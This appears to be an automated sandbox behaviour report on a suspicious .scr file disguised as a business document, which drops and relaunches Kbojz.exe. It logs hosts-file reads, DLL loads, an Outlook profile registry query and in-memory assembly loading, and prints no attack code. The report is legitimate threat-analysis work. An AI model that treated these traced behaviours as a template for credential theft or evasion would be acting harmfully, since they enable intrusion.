                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile read: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr" /S
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: credssp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: wbemcomn2.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: credssp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: wbemcomn2.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ntdsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: credssp.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: f2f5b5c0-4645-40a2-a057-694e3cbb601b<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedDglpobuyba.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: p costura.dotnetzip.pdb.compressedt- source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: p costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Dglpobuyba.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003830000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: p costura.dotnetzip.pdb.compressedlB source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: p@costura.dotnetzip.pdb.compressed source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Program.cs.Net Code: DisplayResult System.AppDomain.Load(byte[])
                    Source: Kbojz.exe.0.dr, Program.cs.Net Code: DisplayResult System.AppDomain.Load(byte[])
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.23d283c.1.raw.unpack, Program.cs.Net Code: DisplayResult System.AppDomain.Load(byte[])
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
